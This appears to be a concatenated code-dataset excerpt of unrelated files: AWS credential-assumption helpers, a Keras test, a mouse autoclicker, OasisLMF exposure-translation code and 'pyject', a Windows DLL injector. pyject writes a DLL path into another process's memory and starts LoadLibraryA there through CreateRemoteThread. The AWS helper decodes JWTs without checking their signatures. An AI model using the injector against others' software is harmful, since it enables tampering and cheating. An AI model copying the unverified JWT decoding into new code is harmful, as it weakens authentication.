self.decoded_token = jwt.decode(self.token, options={"verify_signature": False})
if self.token_managed_id_key not in self.decoded_token:
raise ValueError('Invalid token. Please check your ztoken configuration')
self.user_id = self.decoded_token[self.token_managed_id_key]
self._profiles = []
self._accounts = []
self.get_aws_accounts()
self.get_profiles()
self.use_master_account = False
if login_account is not None:
self.use_master_account = True
self.master_account = login_account
            with ActionOnExit('Log in to Master Account..'):
self.master_credentials = self.get_aws_credentials_from_aws_credentials_service(
self.master_account,
role_name
)
def get_profiles(self):
'''Returns the AWS profiles for a user.
User is implicit from ztoken'''
if self._profiles:
return self._profiles
with ActionOnExit('Contact to AWS Credential Service and get list of all profiles'):
roles_url = self.service_url + self.service_resources['roles'].format(user_id=self.user_id)
r = requests.get(roles_url, headers={'Authorization': 'Bearer {}'.format(self.token)}, timeout=20)
r.raise_for_status()
self._profiles = r.json()['account_roles']
return self._profiles
def get_profile(self, account_name, role_name):
'''Returns the profile information for the given role and account name.'''
self.get_profiles()
for item in self._profiles:
if item['account_name'] == account_name and item['role_name'] == role_name:
return item
else:
raise RuntimeError('Unable to find the role: {} for account: {}'.format(role_name, account_name))
def get_aws_credentials(self, account_name, role_name):
'''Requests the specified AWS Temporary Credentials'''
self.get_profiles()
if self.use_master_account:
try:
return self.get_aws_credentials_from_master_account(account_name, role_name)
except Exception:
error('[{}] No matching role found for account {}/{}. Try profile from ~/.aws/credentials'
.format(account_name, account_name, role_name))
return self.get_aws_credentials_from_profile(account_name)
else:
for profile in self._profiles:
if account_name == profile['account_name'] and profile['role_name'] == role_name:
return self.get_aws_credentials_from_aws_credentials_service(
profile['account_name'],
profile['role_name'])
error('[{}] No matching role found for account {}/{}. Try profile from ~/.aws/credentials'
.format(account_name, account_name, role_name))
return self.get_aws_credentials_from_profile(account_name)
def get_aws_credentials_from_profile(self, account_name):
try:
if boto3.session.Session(profile_name=account_name):
return {'profile_name': account_name}
except botocore.exceptions.ProfileNotFound as e:
error('[{}] {}'
.format(account_name, e))
return None
def get_aws_credentials_from_master_account(self, account_name, role_name):
account = self.get_aws_account(account_name)
with ActionOnExit('[{}] Assuming role {} via {}..'.format(account_name, role_name, self.master_account)):
sts = boto3.client('sts', **self.master_credentials)
role_arn = 'arn:aws:iam::{}:role/{}'.format(
account['id'],
role_name)
response = sts.assume_role(
RoleArn=role_arn,
RoleSessionName='sevenseconds'
)
return {
'aws_access_key_id': response['Credentials'].get('AccessKeyId'),
'aws_secret_access_key': response['Credentials'].get('SecretAccessKey'),
'aws_session_token': response['Credentials'].get('SessionToken')
}
def get_aws_credentials_from_aws_credentials_service(self, account_name, role_name):
'''Requests the specified AWS Temporary Credentials from the provided Credential Service URL'''
role_name = role_name.split('-', 1)[-1]
profile = self.get_profile(account_name, role_name)
with ActionOnExit('[{}] Assuming role {}..'.format(account_name, profile['role_name'])):
credentials_url = self.service_url + self.service_resources['credentials'].format(
account_id=profile['account_id'],
role_name=role_name)
r = requests.get(credentials_url, headers={'Authorization': 'Bearer {}'.format(self.token)},
timeout=30)
r.raise_for_status()
credentials = r.json()
return {
'aws_access_key_id': credentials.get('access_key_id'),
'aws_secret_access_key': credentials.get('secret_access_key'),
'aws_session_token': credentials.get('session_token')
}
def get_aws_accounts(self):
'''Returns a list of all AWS Accounts
Get Accounts with Account ID from Account API
http https://cmdb.example.org/aws-accounts.json
[
{
"name": "account_foo",
"disabled": false,
"id": "123456789012",
},
{
"name": "account_bar",
"disabled": true,
"id": "123123123123",
}
]
'''
if len(self._accounts) == 0:
with ActionOnExit('get AWS Accounts from {}'.format(self.account_list_url)) as act:
r = requests.get(
self.account_list_url,
headers={'Authorization': 'Bearer {}'.format(self.token)},
timeout=20)
r.raise_for_status()
self._accounts = r.json()
act.ok('Count: {}'.format(len(self._accounts)))
return self._accounts
def get_aws_account(self, account_name):
for account in self.get_aws_accounts():
if account['name'] == account_name:
return account
def get_credentials_map(batch, auth):
credentials = {}
worker_result = []
for aws_credentials_service_url in batch:
with ActionOnExit('Authenticating against {}..'.format(aws_credentials_service_url)):
profiles = auth[aws_credentials_service_url].get_profiles()
with multiprocessing.Pool(processes=os.cpu_count() * 4) as pool:
worker_result = pool.starmap(assume_role_worker,
zip(batch[aws_credentials_service_url].values(),
repeat(profiles),
repeat(auth[aws_credentials_service_url])))
for worker_value in worker_result:
if isinstance(worker_value, dict):
credentials.update(worker_value)
return credentials
def assume_role_worker(batch, profiles, auth):
account_name = batch['name']
role = batch['role']
cred_name = '{}/{}'.format(account_name, role)
credentials = auth.get_aws_credentials(account_name, role)
if credentials:
return {cred_name: credentials}
return None
def get_sessions(account_names: list,
config: dict, accounts: list, options: dict):
global_cfg = config.get('global', {})
sessions_tmp = {}
batch = {}
auth = {}
for account_name in account_names:
cfg = accounts.get(account_name) or {}
for key, val in global_cfg.items():
if key not in cfg:
cfg[key] = val
aws_credentials_service_url = cfg.get('aws_credentials_service_url')
saml_role = cfg.get('saml_admin_login_role')
account_alias = cfg.get('alias', account_name).format(account_name=account_name)
base_ami = cfg.get('base_ami', {}).get('account_name')
admin_account = cfg.get('admin_account')
if not admin_account:
fatal_error('Missing Option "admin_account" please set Account Name for Main-Account!')
if not base_ami:
fatal_error('Missing Option "account_name" for base AMI. Please set Account Name for AMI-Account!')
if auth.get(aws_credentials_service_url) is None:
auth[aws_credentials_service_url] = OAuthServices(
aws_credentials_service_url=aws_credentials_service_url,
aws_credentials_service_resources=cfg.get('aws_credentials_service_resources', {}),
account_list_url=cfg.get('account_list_url'),
token_managed_id_key=cfg.get('token_managed_id_key'),
login_account=options.get('login_account', None),
role_name=saml_role,
token=options.get('token')
)
if batch.get(aws_credentials_service_url) is None:
batch[aws_credentials_service_url] = {}
for account in (admin_account, base_ami, account_name):
batch[aws_credentials_service_url]['{}/{}'.format(account, saml_role)] = {
'name': account,
'role': saml_role}
sessions_tmp[account_name] = {
'admin_account_keyname': '{}/{}'.format(admin_account, saml_role),
'base_ami_account_keyname': '{}/{}'.format(base_ami, saml_role),
'account_keyname': '{}/{}'.format(account_name, saml_role),
'account_name': account_name,
'account_alias': account_alias,
'config': cfg,
'auth': auth[aws_credentials_service_url]}
credentials = get_credentials_map(batch, auth)
return rewrite_sessions_map(sessions_tmp, credentials, options)
def rewrite_sessions_map(sessions_tmp: dict, credentials: dict, options: dict):
from ..config import AccountData
sessions = {}
for account_name in sessions_tmp:
account_keyname = sessions_tmp[account_name]['account_keyname']
admin_account_keyname = sessions_tmp[account_name]['admin_account_keyname']
base_ami_account_keyname = sessions_tmp[account_name]['base_ami_account_keyname']
if credentials.get(account_keyname):
sessions[account_name] = AccountData(name=sessions_tmp[account_name]['account_name'],
alias=sessions_tmp[account_name]['account_alias'],
id=None,
session=credentials[account_keyname],
admin_session=credentials[admin_account_keyname],
ami_session=credentials[base_ami_account_keyname],
config=sessions_tmp[account_name]['config'],
auth=sessions_tmp[account_name]['auth'],
dry_run=options.get('dry_run', False),
options=options)
return sessions
```
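`get_credentials_map` above fans out one assume-role call per account over a process pool by zipping the varying batch entries with `itertools.repeat` for the shared arguments. A minimal, self-contained illustration of that `starmap`/`repeat` pattern with a toy worker (not the real `assume_role_worker`):
```python
import multiprocessing
from itertools import repeat

def toy_worker(item, shared_profiles, shared_auth):
    # each call receives one varying item plus the same shared arguments
    return '{}:{}:{}'.format(item, shared_profiles, shared_auth)

if __name__ == '__main__':
    accounts = ['account_foo', 'account_bar']
    with multiprocessing.Pool(processes=2) as pool:
        results = pool.starmap(toy_worker, zip(accounts, repeat('profiles'), repeat('auth')))
    print(results)  # ['account_foo:profiles:auth', 'account_bar:profiles:auth']
```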
#### File: sevenseconds/helper/aws.py
```python
AZ_NAMES_BY_REGION = {}
PENDING_ASSOCIATIONS = {}
def filter_subnets(vpc: object, _type: str):
for subnet in vpc.subnets.all():
if get_tag(subnet.tags, 'Name', '').startswith(_type + '-'):
yield subnet
def get_account_alias(session):
conn = session.client('iam')
return conn.list_account_aliases()['AccountAliases']
def set_account_alias(session, alias):
conn = session.client('iam')
conn.create_account_alias(AccountAlias=alias)
def get_account_id(session):
sts = session.client('sts')
return sts.get_caller_identity()['Account']
def get_az_names(session, region: str):
names = AZ_NAMES_BY_REGION.get(region)
if not names:
conn = session.client('ec2', region)
ec2_zones = conn.describe_availability_zones(Filters=[{'Name': 'state', 'Values': ['available']}])
names = [z['ZoneName'] for z in ec2_zones['AvailabilityZones']]
AZ_NAMES_BY_REGION[region] = names
return names
def get_tag(tags: list, key: str, default=None, prefix=''):
'''
>>> tags = [{'Key': 'aws:cloudformation:stack-id',
... 'Value': 'arn:aws:cloudformation:eu-west-1:123:stack/test-123'},
... {'Key': 'Name',
... 'Value': 'test-123'},
... {'Key': 'StackVersion',
... 'Value': '123'}]
>>> get_tag(tags, 'StackVersion')
'123'
>>> get_tag(tags, 'aws:cloudformation:stack-id')
'arn:aws:cloudformation:eu-west-1:123:stack/test-123'
>>> get_tag(tags, 'notfound') is None
True
>>> parameters = [{'ParameterKey': 'VpcId', 'ParameterValue': 'vpc-123321'},
... {'ParameterKey': 'TaupageId', 'ParameterValue': 'ami-123321'},
... {'ParameterKey': 'EIPAllocation', 'ParameterValue': 'eipalloc-123321'},
... {'ParameterKey': 'SubnetId', 'ParameterValue': 'subnet-123321'},
... {'ParameterKey': 'InstanceType', 'ParameterValue': 't2.micro'},
... {'ParameterKey': 'OddRelease', 'ParameterValue': 'v123'}]
>>> get_tag(parameters, 'TaupageId', prefix='Parameter')
'ami-123321'
>>> get_tag(parameters, 'OddRelease', prefix='Parameter')
'v123'
'''
if isinstance(tags, list):
found = [tag['{}Value'.format(prefix)] for tag in tags if tag['{}Key'.format(prefix)] == key]
if len(found):
return found[0]
return default
def associate_address(ec2c: object, instance_id: str = None):
addr = None
for vpc_addresse in ec2c.describe_addresses()['Addresses']:
if (vpc_addresse.get('AssociationId') is None and
vpc_addresse.get('AllocationId') not in PENDING_ASSOCIATIONS.keys()):
# use existing Elastic IP (e.g. to re-use IP from previous bastion host)
addr = vpc_addresse
if addr is None:
addr = ec2c.allocate_address(Domain='vpc')
if instance_id is None:
PENDING_ASSOCIATIONS[addr.get('AllocationId')] = addr.get('PublicIp')
return addr.get('AllocationId'), addr.get('PublicIp')
else:
ec2c.associate_address(InstanceId=instance_id,
AllocationId=addr.get('AllocationId'))
return addr.get('PublicIp')
```
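For context, `filter_subnets`, `get_tag` and `get_az_names` above are typically used against a boto3 EC2 resource. A hedged usage sketch, assuming the helpers are importable and using placeholder profile, region and VPC id:
```python
import boto3

session = boto3.session.Session(profile_name='myaccount', region_name='eu-west-1')
vpc = session.resource('ec2').Vpc('vpc-12345678')  # placeholder VPC id

for subnet in filter_subnets(vpc, 'internal'):
    print(subnet.id, get_tag(subnet.tags, 'Name'))

print(get_az_names(session, 'eu-west-1'))  # cached in AZ_NAMES_BY_REGION after the first call
```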
#### File: sevenseconds/helper/__init__.py
```python
import sys
import click
from clickclick import secho
import yaml
from datetime import timedelta
import time
import threading
START_TIME = time.time()
THREADDATA = threading.local()
PATTERNLENGTH = 25
QUITE = False
class ActionOnExit:
def __init__(self, msg, **kwargs):
self.msg_args = kwargs
self.msg = click.style(msg.format(**kwargs), bold=True)
self.errors = []
self._suppress_exception = False
self.ok_msg = ' OK'
self.call_time = time.time()
if not QUITE:
self._print(' ...')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is None:
if not self.errors:
self.msg += click.style(' {}'.format(self.ok_msg), fg='green', bold=True)
elif not self._suppress_exception:
self.msg += click.style(' EXCEPTION OCCURRED: {}'.format(exc_val), fg='red', bold=True)
if not QUITE or self.errors:
self._print(' +{:.6f}s'.format(time.time() - self.call_time))
def fatal_error(self, msg, **kwargs):
self._suppress_exception = True # Avoid printing "EXCEPTION OCCURRED: -1" on exit
self.error(msg, **kwargs)
self._print(' +{:.6f}s'.format(time.time() - self.call_time))
sys.exit(1)
def error(self, msg, **kwargs):
self.msg += click.style(' {}'.format(msg), fg='red', bold=True, **kwargs)
self.errors.append(msg)
def progress(self):
        self.msg += click.style(' .')
def warning(self, msg, **kwargs):
self.msg += click.style(' {}'.format(msg), fg='yellow', bold=True, **kwargs)
self.errors.append(msg)
def ok(self, msg):
self.ok_msg = ' {}'.format(msg)
def _print(self, suffix=''):
elapsed_seconds = time.time() - START_TIME
# using timedelta here for convenient default formatting
elapsed = timedelta(seconds=elapsed_seconds)
print('[{} | {}] {}{}'.format(
getattr(THREADDATA, 'name', 'GLOBAL').rjust(PATTERNLENGTH),
elapsed,
self.msg,
suffix))
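# Illustrative usage of ActionOnExit (not part of the original module): it is a context
# manager that prints "<message> ..." on entry and, on exit, appends the ok message
# (default " OK") in green, or the accumulated error/warning text in red/yellow,
# together with the elapsed time, e.g.:
#
#     with ActionOnExit('Configuring account {name}..', name='foo') as act:
#         do_work()
#         act.ok('configured')
#
# Messages passed to act.error()/act.warning() are appended to the line, recorded in
# act.errors, and suppress the default " OK" suffix.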
def _secho(msg, **kwargs):
elapsed_seconds = time.time() - START_TIME
# using timedelta here for convenient default formatting
elapsed = timedelta(seconds=elapsed_seconds)
secho('[{} | {}] {}'.format(getattr(THREADDATA, 'name', 'GLOBAL').rjust(PATTERNLENGTH), elapsed, msg), **kwargs)
def error(msg, **kwargs):
_secho(msg, fg='red', bold=True, **kwargs)
def fatal_error(msg, **kwargs):
error(msg, **kwargs)
sys.exit(1)
def ok(msg=' OK', **kwargs):
if not QUITE:
_secho(msg, fg='green', bold=True, **kwargs)
def warning(msg, **kwargs):
_secho(msg, fg='yellow', bold=True, **kwargs)
def info(msg):
if not QUITE:
_secho(msg, fg='blue', bold=True)
def substitute_template_vars(data, context: dict):
'''
>>> substitute_template_vars({'test': {'foo': {'foobar': 'dummy-{bob}'}}},
... {'bob': 'BOB-REPLACE', 'ann': 'ANN-REPLACE'})
{'test': {'foo': {'foobar': 'dummy-BOB-REPLACE'}}}
'''
serialized = yaml.safe_dump(data)
data = yaml.safe_load(serialized)
for k, v in data.items():
if isinstance(v, str):
data[k] = v.format(**context)
elif isinstance(v, dict):
data[k] = substitute_template_vars(v, context)
return data
``` |
{
"source": "JonathanBechtel/KerasBeats",
"score": 3
} |
#### File: src/tests/test_nbeats.py
```python
import pytest
from kerasbeats import utilities, NBeatsModel
class TestNBeatsConfiguration():
def test_generic_prediction_output(self, numeric_data, generic_model):
"""Confirms that model works w/ univariate time series + prediction
has the correct shape"""
windows, labels = utilities.prep_time_series(numeric_data)
generic_model.fit(windows, labels, epochs = 1)
assert generic_model.predict(windows).shape == (windows.shape[0], 1)
eval_ = generic_model.evaluate(windows, labels)
assert type(eval_) == list
assert len(eval_) == 3
def test_interpretable_prediction_output(self, numeric_data,
interpretable_model):
"""Confirms that model works w/ univariate timeries for interpretable
model"""
windows, labels = utilities.prep_time_series(numeric_data,
lookback = 7,
horizon = 2)
interpretable_model.fit(windows, labels, epochs = 1)
assert interpretable_model.predict(windows).shape == (windows.shape[0], 2)
eval_ = interpretable_model.evaluate(windows, labels)
assert type(eval_) == list
assert len(eval_) == 3
``` |
{
"source": "JonathanBerkeley/pyject",
"score": 2
} |
#### File: JonathanBerkeley/pyject/pyject.py
```python
import sys
import os
import glob
import time
import subprocess
import ctypes
from ctypes import wintypes
try:
import psutil
except ModuleNotFoundError:
print("Required package psutil was not found, attempting automatic install")
subprocess.check_call([sys.executable, "-m", "pip", "install", "psutil"])
try:
import psutil
except ModuleNotFoundError:
print("Required package 'psutil' could not be automatically installed. Install psutil and try again.")
sys.exit(1)
# Change this string to the name of the process you wish to target ===============================================
target_process = ""
if target_process == "":
print("You need to enter a process name in the target_process field within the python file")
sys.exit(5)
# Logfile logs details about each session
logfile = open("pyject.log", "a+")
def main():
if os.name != "nt":
print("Script targets Windows operating systems only. (Exiting)")
sys.exit(0)
dlls = None
logfile.writelines("\nNew session:\n")
try:
dlls = glob.glob("*.dll")
if not dlls:
raise Exception('\t(ERROR) No DLL(s) found to inject (Exiting)\n')
for dll in dlls:
logfile.write("\t(INFO) Preparing to load " + str(dll) + "\n")
except Exception as ex:
print(ex)
logfile.write(str(ex))
safe_exit(2)
logfile.write("\t(INFO) Waiting for " + target_process + "\n")
process_id = -1
while process_id == -1:
_ = os.system("cls")
print("Waiting for ", target_process, " to start...")
process_id = if_proc_running_get_id(target_process)
time.sleep(1)
# Sleep to allow target program time to load
time.sleep(3)
logfile.write("\t(INFO) " + target_process + " found with process id: " + str(process_id) + "\n")
print(target_process, "found with pid", process_id)
if process_id != 0:
for dll in dlls:
logfile.write("\t(INFO) Attempted to inject " + dll + " into " + str(process_id) + "\n")
# Critical zone
try:
if inject_into_process(os.path.abspath(dll), process_id):
print("Injection appears to have succeeded for ", dll)
logfile.write(
"\t(SUCCESS) Injection of " + dll + " into " + str(process_id) + " seems to have succeeded\n")
else:
print("Injection appears to have failed for ", dll)
logfile.write(
"\t(ERROR) Injection of " + dll + " into " + str(process_id) + " seems to have failed\n")
except Exception as ex:
print(ex)
logfile.write("\t(ERROR) Failed to inject " + dll + " into " + str(process_id) + " (Exiting)\n")
safe_exit(3)
time.sleep(2)
else:
logfile.write("\t(ERROR) Error getting " + target_process + " process id (Exiting)\n")
safe_exit(4)
safe_exit(0)
# Generalised this function for easier reuse
def if_proc_running_get_id(proc_str):
proc_str += ".exe"
for process in psutil.process_iter():
if proc_str.lower() in process.name().lower():
return process.pid
return -1
def inject_into_process(dll_path, pid):
k32 = ctypes.WinDLL('kernel32', use_last_error=True)
# Following section sets the arguments and return types for various kernel32 functions
k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
k32.OpenProcess.restype = wintypes.HANDLE
k32.GetModuleHandleA.argtypes = [wintypes.LPCSTR]
k32.GetModuleHandleA.restype = wintypes.HMODULE
k32.GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR]
k32.GetProcAddress.restype = wintypes.LPVOID
k32.VirtualAllocEx.argtypes = [wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t, wintypes.DWORD, wintypes.DWORD]
k32.VirtualAllocEx.restype = wintypes.LPVOID
k32.WriteProcessMemory.argtypes = [wintypes.HANDLE, wintypes.LPVOID, wintypes.LPCVOID, ctypes.c_size_t,
ctypes.c_size_t]
k32.CreateRemoteThread.argtypes = [wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t, wintypes.LPVOID,
wintypes.LPVOID, wintypes.DWORD, wintypes.LPDWORD]
# Open process
process_handle = k32.OpenProcess(2035711, False, pid)
if not process_handle:
print("Getting process handle failed")
logfile.write("\t(ERROR) Getting process handle (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Obtain handle to kernel32 module in memory
encoded_dll_path = dll_path.encode("ascii")
req_write_size = len(encoded_dll_path)
kernel_module_handle = k32.GetModuleHandleA("kernel32.dll".encode("ascii"))
if not kernel_module_handle:
print("Getting kernel module handle failed")
logfile.write("\t(ERROR) Getting kernel module (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Find load library
load_lib = k32.GetProcAddress(kernel_module_handle, "LoadLibraryA".encode("ascii"))
if not load_lib:
print("Getting LoadLibraryA address failed")
logfile.write("\t(ERROR) Getting LoadLibraryA address (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Virtual allocation
virt_alloc = k32.VirtualAllocEx(process_handle, None, req_write_size, 0x00001000, 0x40)
if not virt_alloc:
print("Virtual allocation failed")
logfile.write("\t(ERROR) Virtual allocation failed (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Write to process memory
write_proc = k32.WriteProcessMemory(process_handle, virt_alloc, encoded_dll_path, req_write_size, 0)
if not write_proc:
print("Writing to process memory failed")
logfile.write("\t(ERROR) Writing to process memory failed (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Create remote thread in process
    # Start the remote thread at the LoadLibraryA address resolved above (load_lib),
    # passing the address of the written DLL path as its argument
    return k32.CreateRemoteThread(process_handle, None, 0, load_lib, virt_alloc,
                                  0, None)
def safe_exit(code):
logfile.close()
sys.exit(code)
if __name__ == "__main__":
main()
``` |
{
"source": "JonathanBerkeley/python_scripts",
"score": 3
} |
#### File: JonathanBerkeley/python_scripts/clicker.py
```python
import sys
import mouse
import time
def main():
if len(sys.argv) > 1:
interval = int(sys.argv[1])
else:
interval = 7
while True:
try:
clicker_code(interval)
except KeyboardInterrupt:
print("-- Exitting --")
sys.exit(0)
def clicker_code(interval):
mouse.click()
time.sleep(interval)
if __name__ == "__main__":
main()
``` |
{
"source": "jonathanbethel/OasisLMF",
"score": 3
} |
#### File: oasislmf/exposures/csv_trans.py
```python
__all__ = [
'Translator'
]
import json
import logging
import multiprocessing
import os
import pandas as pd
from lxml import etree
from oasislmf.utils.concurrency import (
multiprocess,
multithread,
Task,
)
class Translator(object):
def __init__(self, input_path, output_path, xslt_path, xsd_path=None, append_row_nums=False, chunk_size=5000, logger=None):
"""
        Transforms exposures/locations in CSV format by converting the source
        file to XML and applying an XSLT transform, which applies rules for
        selecting, merging or updating columns. Optionally, an XSD file can be
        passed for output validation.
:param input_path: Source exposures file path, which should be in CSV comma delimited format
:type input_path: str
:param output_path: File to write transform results
:type output_path: str
:param xslt_path: Source exposures Transformation rules file
:type xslt_path: str
:param xsd_path: Source exposures output validation file
:type xsd_path: str
        :param append_row_nums: Append line numbers to the first column of the output, called `ROW_ID` [1 .. n], where n is the number of rows processed.
:type append_row_nums: boolean
:param chunk_size: Number of rows to process per multiprocess Task
:type chunk_size: int
"""
self.logger = logger or logging.getLogger()
self.xsd = (etree.parse(xsd_path) if xsd_path else None)
self.xslt = etree.parse(xslt_path)
self.fpath_input = input_path
self.fpath_output = output_path
self.row_nums = append_row_nums
self.row_limit = chunk_size
self.row_header_in = None
self.row_header_out = None
def __call__(self):
csv_reader = pd.read_csv(self.fpath_input, iterator=True, dtype=object, encoding='utf-8')
task_list = []
for chunk_id, (data, first_row, last_row) in enumerate(self.next_file_slice(csv_reader)):
task_list.append(Task(self.process_chunk, args=(data,first_row,last_row, chunk_id), key=chunk_id))
results = {}
num_ps = multiprocessing.cpu_count()
for key, data in multithread(task_list, pool_size=num_ps):
results[key] = data
## write output to disk
for i in range(0, len(results)):
if (i == 0):
self.write_file_header(results[i].columns.tolist())
results[i].to_csv(
self.fpath_output,
mode='a',
encoding='utf-8',
header=False,
index=False,
)
def process_chunk(self, data, first_row_number, last_row_number, seq_id):
xml_input_slice = self.csv_to_xml(
self.row_header_in,
data
)
self.print_xml(xml_input_slice)
# Transform
xml_output = self.xml_transform(xml_input_slice, self.xslt)
# Validate Output
if self.xsd:
self.logger.debug(self.xml_validate(xml_output, self.xsd))
# Convert transform XML back to CSV
return self.xml_to_csv(
xml_output, # XML etree
first_row_number, # First Row in this slice
last_row_number # Last Row in this slice
)
def csv_to_xml(self, csv_header, csv_data):
root = etree.Element('root')
for row in csv_data:
rec = etree.SubElement(root, 'rec')
for i in range(0, len(row)):
if(row[i] not in [None, "", 'NaN']):
rec.set(csv_header[i], row[i])
return root
def xml_to_csv(self, xml_elementTree, row_first, row_last):
root = xml_elementTree.getroot()
# Set output col headers
if not (self.row_header_out):
self.row_header_out = root[0].keys()
# create Dataframe from xml and append each row
rows = []
for rec in root:
rows.append(dict(rec.attrib))
df_out = pd.DataFrame(rows, columns=self.row_header_out)
# Add column for row_nums if set
if self.row_nums:
start = row_first + 1
end = start + len(df_out)
df_out.insert(0, 'ROW_ID', pd.Series(range(start,end)))
return df_out
def xml_validate(self, xml_etree, xsd_etree):
xmlSchema = etree.XMLSchema(xsd_etree)
self.print_xml(xml_etree)
self.print_xml(xsd_etree)
if (xmlSchema.validate(xml_etree)):
return True
else:
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.error('Input failed to Validate')
log = xmlSchema.error_log
self.logger.error(log.last_error)
return False
def xml_transform(self, xml_doc, xslt):
lxml_transform = etree.XSLT(xslt)
return lxml_transform(xml_doc)
def next_file_slice(self, file_reader):
while True:
try:
df_slice = file_reader.get_chunk(self.row_limit)
if(not self.row_header_in):
self.row_header_in = df_slice.columns.values.tolist()
yield (
df_slice.fillna("").values.astype("unicode").tolist(),
df_slice.first_valid_index(),
df_slice.last_valid_index()
)
except StopIteration:
self.logger.debug('End of input file')
break
def write_file_header(self, row_names):
pd.DataFrame(columns=row_names).to_csv(
self.fpath_output,
encoding='utf-8',
header=True,
index=False,
)
def print_xml(self, etree_obj):
self.logger.debug('___________________________________________')
self.logger.debug(etree.tostring(etree_obj, pretty_print=True))
```
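For orientation, a minimal usage sketch of the Translator above; the file paths are hypothetical placeholders (in practice they come from the surrounding OasisLMF configuration):
```python
from oasislmf.exposures.csv_trans import Translator

translator = Translator(
    input_path='source_exposures.csv',        # placeholder paths
    output_path='canonical_exposures.csv',
    xslt_path='transform_rules.xslt',
    xsd_path='output_schema.xsd',             # optional: enables XSD validation
    append_row_nums=True,
    chunk_size=5000,
)
translator()  # reads the CSV in chunks, transforms each chunk concurrently, writes the result
```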
#### File: oasislmf/exposures/pipeline.py
```python
__all__ = [
'OasisFilesPipeline'
]
class OasisFilesPipeline(object):
def __init__(
self,
model_key=None,
source_exposures_file_path=None,
canonical_exposures_file_path=None,
model_exposures_file_path=None,
keys_file_path=None,
keys_errors_file_path=None
):
self._model_key = model_key
self._source_exposures_file_path = source_exposures_file_path
self._canonical_exposures_file_path = canonical_exposures_file_path
self._model_exposures_file_path = model_exposures_file_path
self._keys_file_path = keys_file_path
self._keys_errors_file_path = keys_errors_file_path
self._items_file_path = None
self._coverages_file_path = None
self._gulsummaryxref_file_path = None
self._oasis_files = {
'items': self._items_file_path,
'coverages': self._coverages_file_path,
'gulsummaryxref': self._gulsummaryxref_file_path
}
self._file_paths = (
'source_exposures_file_path',
'canonical_exposures_file_path',
'model_exposures_file_path',
'keys_file_path',
'keys_errors_file_path',
'items_file_path',
'coverages_file_path',
'gulsummaryxref_file_path',
)
def __str__(self):
return '{}: {}'.format(self.__repr__(), self.model_key)
def __repr__(self):
return '{}: {}'.format(self.__class__, self.__dict__)
def _repr_pretty_(self, p, cycle):
p.text(str(self) if not cycle else '...')
@property
def model_key(self):
"""
Model key property - getter only.
:getter: Gets the key of model to which the pipeline is attached.
"""
return self._model_key
@property
def source_exposures_file_path(self):
"""
Source exposures file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._source_exposures_file_path
@source_exposures_file_path.setter
def source_exposures_file_path(self, p):
self._source_exposures_file_path = p
@property
def canonical_exposures_file_path(self):
"""
Canonical exposures file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._canonical_exposures_file_path
@canonical_exposures_file_path.setter
def canonical_exposures_file_path(self, p):
self._canonical_exposures_file_path = p
@property
def model_exposures_file_path(self):
"""
Model exposures file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._model_exposures_file_path
@model_exposures_file_path.setter
def model_exposures_file_path(self, p):
self._model_exposures_file_path = p
@property
def keys_file_path(self):
"""
Oasis keys file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._keys_file_path
@keys_file_path.setter
def keys_file_path(self, p):
self._keys_file_path = p
@property
def keys_errors_file_path(self):
"""
Oasis keys error file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._keys_errors_file_path
@keys_errors_file_path.setter
def keys_errors_file_path(self, p):
self._keys_errors_file_path = p
@property
def items_file_path(self):
"""
Oasis items file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._items_file_path
@items_file_path.setter
def items_file_path(self, p):
self._items_file_path = self.oasis_files['items'] = p
@property
def coverages_file_path(self):
"""
Oasis coverages file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._coverages_file_path
@coverages_file_path.setter
def coverages_file_path(self, p):
self._coverages_file_path = self.oasis_files['coverages'] = p
@property
def gulsummaryxref_file_path(self):
"""
GUL summary file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._gulsummaryxref_file_path
@gulsummaryxref_file_path.setter
def gulsummaryxref_file_path(self, p):
self._gulsummaryxref_file_path = self.oasis_files['gulsummaryxref'] = p
@property
def oasis_files(self):
"""
Oasis files set property - getter only.
:getter: Gets the complete set of paths of the generated Oasis
        files, including ``items.csv``, ``coverages.csv``, ``gulsummaryxref.csv``.
"""
return self._oasis_files
def clear(self):
"""
Clears all file path attributes in the pipeline.
"""
[setattr(self, p, None) for p in self._file_paths]
```
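A brief sketch of how the pipeline's path properties and the `oasis_files` dict interact (paths are placeholders):
```python
from oasislmf.exposures.pipeline import OasisFilesPipeline

pipeline = OasisFilesPipeline(model_key='MyModel')
pipeline.items_file_path = 'items.csv'                    # also sets oasis_files['items']
pipeline.coverages_file_path = 'coverages.csv'
pipeline.gulsummaryxref_file_path = 'gulsummaryxref.csv'
print(pipeline.oasis_files)
# {'items': 'items.csv', 'coverages': 'coverages.csv', 'gulsummaryxref': 'gulsummaryxref.csv'}

pipeline.clear()  # resets every tracked file path attribute to None
```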
#### File: tests/cmd/test_bin_check.py
```python
from unittest import TestCase
import os
import six
from backports.tempfile import TemporaryDirectory
from mock import patch
from oasislmf.cmd import RootCmd
def get_command(target_dir=None, extras=None):
kwargs_str = ' '.join('--{} {}'.format(k, v) for k, v in six.iteritems(extras or {}))
return RootCmd(argv='bin check {} {}'.format(kwargs_str, target_dir or '').split())
class CheckCmdRun(TestCase):
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_target_is_not_supplied___cwd_is_checked(self, check_conv_tools, check_inputs_mock):
cmd = get_command()
res = cmd.run()
self.assertEqual(0, res)
